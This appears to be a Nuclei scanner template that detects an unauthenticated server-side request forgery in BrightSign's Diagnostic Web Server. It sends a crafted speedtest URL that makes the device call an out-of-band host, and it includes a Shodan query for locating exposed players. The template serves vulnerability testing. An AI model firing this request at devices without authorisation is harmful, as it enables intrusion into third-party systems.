id: brightsign-dsdws-ssrf

info:
  name: BrightSign Digital Signage Diagnostic Web Server 8.2.26 Unauthenticated - SSRF
  author: 0x_Akoko
  severity: medium
  description: Unauthenticated Server-Side Request Forgery (SSRF) vulnerability exists in the BrightSign digital signage media player affecting the Diagnostic Web Server (DWS). The application parses user supplied data in the 'url' GET parameter to construct a diagnostics request to the Download Speed Test service.
  reference:
    - https://brightsign.zendesk.com/hc/en-us/articles/360056180694-Regarding-Advisory-ID-ZSL-2020-5595
    - https://www.zeroscience.mk/codes/brightsign_ssrf.txt
  metadata:
    max-request: 1
    verified: true
    shodan-query: title:"BrightSign"
  tags: ssrf,brightsign,unauth

http:
  - method: GET
    path:
      - '{{BaseURL}}/speedtest?url={{interactsh-url}}'

    matchers-condition: and
    matchers:
      - type: word
        part: interactsh_protocol # Confirms the HTTP Interaction
        words:
          - "http"

      - type: dsl
        dsl:
          - 'contains(body_1, "Downloaded")'